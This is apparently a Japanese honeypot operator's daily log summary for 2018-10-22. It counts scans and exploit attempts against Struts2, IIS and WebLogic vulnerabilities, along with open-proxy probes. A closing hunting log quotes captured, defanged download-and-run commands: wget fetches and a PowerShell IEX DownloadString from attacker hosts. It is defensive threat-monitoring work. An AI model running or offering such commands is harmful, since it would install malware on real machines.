ハニーポットのログ分析(2018/10/22)
WOWhoneypotの2018/10/22(月) (運用139日目)の簡易分析です。
本日の総アクセス件数は 43件です。以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 27 | 2018-10-22 | アクセス | GET / |
| 5 | 2018-10-22 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
| 1 | 2018-10-22 | IISの脆弱性(CVE-2017-7269)を突く攻撃 | PROPFIND / |
| 1 | 2018-10-22 | Weblogicの脆弱性(CVE-2017-10271)を突く攻撃 | POST /wls-wsat/CoordinatorPortType |
| 1 | 2018-10-22 | クローリング | GET /robots.txt |
| 1 | 2018-10-22 | 不正中継の調査 | GET hxxp://www.ip.cn/ |
| 1 | 2018-10-22 | 不正中継の調査 | GET hxxp://www.123cha.com/ |
| 1 | 2018-10-22 | 不正中継の調査 | GET hxxp://api.ipify.org/ |
| 1 | 2018-10-22 | 不正中継の調査 | GET hxxp://112.35.63.31:10083/index.php |
| 1 | 2018-10-22 | 録画予約システムfoltia ANIME LOCKERの調査 | GET /foltia/ |
| 1 | 2018-10-22 | 録画予約システムepgrecの調査 | GET /epgrec/do-record.sh |
| 1 | 2018-10-22 | 不正中継の調査 | CONNECT www.baidu.com:443 |
| 1 | 2018-10-22 | 不正中継の調査 | CONNECT cn.bing.com:443 |
本日のドメイン名でのアクセスは以下です。
2 GET /
1 GET /robots.txt
本日のハンティングログは以下です。
2 2018-10-22 wget -c hxxp://123.249.88[.]147:2222/TTFFlx
1 2018-10-22 wget -c hxxp://wap.tfddos[.]net:57843/linux
1 2018-10-22 IEX $WC.DownloadString ('hxxp://101.200.45[.]78/images/test/DL.php')
以上です。
